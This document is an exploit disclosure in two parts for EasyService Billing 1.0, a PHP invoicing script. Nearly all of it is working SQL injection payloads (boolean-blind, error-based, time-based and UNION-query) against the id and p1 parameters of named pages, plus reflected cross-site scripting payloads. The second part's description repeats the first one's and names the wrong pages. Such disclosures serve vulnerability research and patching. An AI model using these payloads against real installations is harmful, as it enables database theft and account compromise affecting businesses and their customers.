EasyService Billing 1.0 SQL Injection / Cross Site Scripting

`-------------------  
Exploit 1 of 2:  
  
  
# Exploit Title: EasyService Billing 1.0 - 'template_().php' SQL Injection / Cross-Site Scripting  
# Dork: N/A  
# Date: 22.05.2018  
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)  
# Vendor Homepage:  
https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594  
# Version: 1.0  
# Category: Webapps  
# Tested on: Kali linux  
# Description : all of the print and preview pages have the same vulnerabilities. (template_SBilling.php, template_Receipt.php, template_SBillingPerforma.php,template_SBillingQuotation.php)  
All of them use the same parameters. An attacker can use any of these.  
====================================================  
  
# PoC : SQLi :  
  
Parameter : id  
  
Type : boolean-based blind  
Demo :  
http://test.com/EasyServiceBilling/print/template_SBilling.php?tid=3&id=145  
Payload : tid=3&id=145' OR NOT 3938=3938#  
  
Type : error-based  
Demo :  
http://test.com/EasyServiceBilling/print/template_SBilling.php?tid=3&id=145  
Payload : tid=3&id=145' AND (SELECT 7524 FROM(SELECT  
COUNT(*),CONCAT(0x7162707671,(SELECT  
(ELT(7524=7524,1))),0x71767a7171,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UjGj  
  
Type : AND/OR time-based blind  
Demo :  
http://test.com/EasyServiceBilling/print/template_SBilling.php?tid=3&id=145  
Payload : tid=3&id=145' AND SLEEP(5)-- USaG  
  
  
====================================================  
# PoC : XSS :  
  
Payload :  
http://test.com/EasyServiceBilling/print/template_SBilling.php?tid=3&id='  
</script><script>alert(1)</script>a;  
  
  
-------------------  
Exploit 2 of 2:  
  
# Exploit Title: EasyService Billing 1.0 - 'customer-new-s.php' SQL  
Injection / Cross-Site Scripting  
# Dork: N/A  
# Date: 22.05.2018  
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)  
# Vendor Homepage: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594  
# Version: 1.0  
# Category: Webapps  
# Tested on: Kali linux  
# Description : all of the print and preview pages have the same vulnerabilities. (template_SBilling.php, template_Receipt.php, template_SBillingPerforma.php,template_SBillingQuotation.php)  
All of them use the same parameters. An attacker can use any of these.  
====================================================  
  
# PoC : SQLi :  
  
Parameter : id  
  
Type : boolean-based blind  
Demo :  
http://test.com/EasyServiceBilling/customer-new-s.php?p1=akkus+keyney  
Payload : Payload: p1=akkus+keyney' AND 1815=1815 AND 'izgU'='izgU  
  
Type : error-based  
Demo :  
http://test.com/EasyServiceBilling/customer-new-s.php?p1=akkus+keyney  
Payload : p1=akkus+keyney' AND (SELECT 2882 FROM(SELECT  
COUNT(*),CONCAT(0x7162627171,(SELECT  
(ELT(2882=2882,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UFGx'='UFGx  
  
Type : AND/OR time-based blind  
Demo :  
http://test.com/EasyServiceBilling/customer-new-s.php?p1=akkus+keyney  
Payload : p1=akkus+keyney' AND SLEEP(5) AND 'TJOA'='TJOA  
  
Type : UNION query  
Demo :  
http://test.com/EasyServiceBilling/customer-new-s.php?p1=akkus+keyney  
Payload : p1=akkus+keyney' UNION ALL SELECT  
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162627171,0x4e70435a69565a6248565947566b74614e7a5969635671587073454f75726f53795477506d514567,0x717a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#  
  
  
  
====================================================  
# PoC : XSS :  
  
Payload :  
http://test.com/EasyServiceBilling/customer-new-s.php?p1='  
</script><script>alert(1)</script>a  
  
  
  
`